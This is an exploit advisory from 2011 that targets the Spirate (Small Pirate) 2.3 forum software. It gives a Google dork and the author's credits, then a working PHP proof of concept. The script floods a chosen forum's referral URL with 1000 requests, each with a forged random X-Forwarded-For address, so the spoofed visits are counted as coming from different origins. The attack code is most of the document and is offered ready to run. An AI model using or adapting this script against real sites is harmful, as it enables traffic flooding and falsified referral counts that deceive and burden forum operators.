# Exploit Title: Small Pirate <= 2.3 Incorrect Flood Filter Headers
# Google Dork: Powered by Spirate 2.3 & SMF
# Date: 25/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software Link: http://www.spirate.net
# Tested on: Linux
[Comment]
Agradecimmientos: Hernan Jais, Alfonso Cuevas, Inyexion
Lucas Apa, Juan Urbano, Sunplace, KikoArg
Knet, Harakiri, Luciano Lapporta Podazza,
SIR y en especial a mi madre.
This vulnerability takes advantage of randomly generated headers and thus generating false origin falsifies visits
[PoC]
<?php
//////config//////////////
$flood = 0;
$host = "domain.com";
$path = "/indexphp?referredby=[id]"; // change id!!
////////////////////////////////
////////FLOODER////////////////
while ( $flood < 1000) {
$rangoip1 = rand(1,254);
$rangoip2 = rand(1,254);
$rangoip3 = rand(1,254);
$rangoip4 = rand(1,254);
$ipgenerada = $rangoip1.".".$rangoip2.".".$rangoip3.".".$rangoip4;
$da = fsockopen($host, 80, $errno, $errstr, 30);
if (!$da) {
echo "$errstr ($errno)\n";
} else {
$salida = "GET http://".$host."$path HTTP/1.1\r\n";
$salida .= "Host: ".$host."\r\n";
$salida .= "X-Forwarded-For: $ipgenerada\r\n";
$salida .= "Via: CB-Prx\r\n";
$salida .= "Connection: Close\r\n\r\n";
fwrite($da, $salida);
fclose($da);
$flood++;
}
echo "Flooded a $host$path exitoso con la ip $ipgenerada<br>";
}
?>